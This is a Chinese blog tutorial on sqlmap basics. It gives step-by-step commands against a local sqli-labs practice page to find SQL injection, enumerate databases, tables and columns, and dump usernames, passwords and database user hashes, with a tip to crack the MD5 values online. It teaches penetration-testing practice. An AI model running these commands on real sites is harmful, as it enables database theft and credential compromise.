sqlmap的使用 ---- 入门

最新推荐文章于 2025-10-28 10:55:16 发布
原创 最新推荐文章于 2025-10-28 10:55:16 发布 · 3.8k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sqlmap基础用法

本文详细介绍如何使用SQLMap这一自动化SQL注入工具,从判断URL是否存在注入开始,逐步深入到查询数据库、表名、字段名,直至获取字段内容和数据库用户密码等关键操作。

sqlmap是一个自动化的sql注入工具,其主要功能就是扫描、发现给定url的sql注入漏洞。

1. 判断是否存在注入

当url中存在两个参数时,要使用双引号

sqlmap -u +url

这里写图片描述

2. 判断文本中的请求是否存在注入
利用工具burp suite抓包,保存为文本
这里写图片描述

sqlmap -r +http请求文本

这里写图片描述
3. 查询当前用户下的所有数据库

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
这里写图片描述
4. 获取数据库中的表名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
这里写图片描述
5. 获取表中的字段名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
这里写图片描述
6. 获取字段内容

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump
这里写图片描述
7. 获取数据库中的所有用户

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --users
这里写图片描述
8. 获取数据库用户的密码

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords
查询到的密码时MD5值,在MD5解密网站即可得到明文密码
这里写图片描述
9. 获取当前网站数据库的名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db
这里写图片描述
10. 获取当前数据库的用户名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user
这里写图片描述

Sqlmap使用教程
wrjhs的博客
04-15 2269
SQLMap是一款自动化SQL注入工具,支持检测和利用多种数据库(如MySQL、Oracle、SQL Server等)的注入漏洞,能够获取数据库信息、文件系统访问权限甚至执行操作系统命令。自动化检测注入点:自动识别GET/POST参数、Cookie等位置的注入漏洞。数据提取:获取数据库名、表、字段及数据。绕过WAF:通过篡改脚本绕过Web应用防火墙的检测。操作系统交互:获取Shell权限或执行远程命令。
sqlmap的应用实战
vala0901的博客
05-10 7374
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
最新发布
2509_92430467的博客
10-28 1133
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
超详细 sqlmap 使用教程(从入门到进阶)
syg6921008的博客
04-08 5317
例 1:自动识别 + 导出所有数据例 2:POST 登录接口注入测试例 3:使用 Burp 抓包测试例 4:读取数据库用户信息并执行 whoami建议理由使用--batch做自动测试减少交互操作,提高效率指定-p参数避免浪费时间在无关参数学会使用-r静态请求文件更适合测试复杂 POST、Cookie 请求配合使用手动确认参数后自动化测试更高效测试环境先用线上目标避免影响服务禁用系统功能或告警如--os-shell等需谨慎使用🚀 七、sqlmap 高级技巧 & 实战应用拓展。
sqlmap功能梳理
Starr
03-13 2946
文章目录1. Target连接数据库加载文件2. Requestcookiehost、UA等其它http头部认证代理延迟、超时与重置随机参数安全模式忽略其它3. Optimization4. Injection指定DBMS指定系统sqlmap机制开关无效值替换指定payload前后缀设置tamper绕过waf脚本5. Detection探测levelrisk页面比较6. sqli techniqueDNS攻击!!!二次注入7. 指纹8. Enumeration检索信息经典套路其它(部分):9. Brute
sqlmap使用教程
sworddancing is the best one
10-21 6966
#sqlmap使用教程 作者:刘行 李江涛     毫无疑问地说,sqlmap是一款功能十分强大的sql注入工具,这篇文章我们就来学习一下sqlmap的一些基本的使用。     接下来我们就以南邮上一道简单的宽字节注入题来学习sql
sqlmap简单使用
selecthch的博客
06-02 2407
今天学习了sqlmap使用,自己又在网上查找了一些学习笔记然后就想在本地搭建的环境上测试使用一下sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返...
安全圈最被低估的10个神器:一个比一个强大,大佬都在偷偷用!零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 2854
这些冷门的网络安全工具是你工具箱中的强大补充,它们提供了独特的功能,覆盖从侦察到漏洞利用的多个环节。虽然像 Nmap 和 Burp Suite 这样的工具不可或缺,但探索像 CyberChef、BloodHound 和 Impacket 这样的“宝藏工具”能让你在网络安全工作中更加高效和灵活。
sqlmap 如何 --os-shell 及反弹shell_sqlmap跑shell(3)
2401_84281594的博客
05-17 1289
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。
精选资源
sqlmap手册-中文版.pdf
07-30
sqlmap
SQLMAP入门命令解析
kk的博客
05-27 842
sql注入常用命令解析
精选资源
sqlmap-wiki-zhcn::syringe:可能是最完整的sqlmap中文文档
02-04
- **开始使用**:引导新手快速入门,包括基本命令和概念。 - **高级特性**:详细解释各种高级选项和技术,如多线程、代理设置、自定义脚本等。 - **插件和模块**:介绍SQLMap的插件系统,以及如何扩展其功能。 - **...
网络安全-sqlmap实战之sqlilabs-Less8_sqli-labs-master less-8 select from users where
2401_84254087的博客
05-02 255
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。添加–dbms参数,–technique参数。使用-o参数优化,–batch参数进行跳过。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 5万+
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 7万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 3575
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值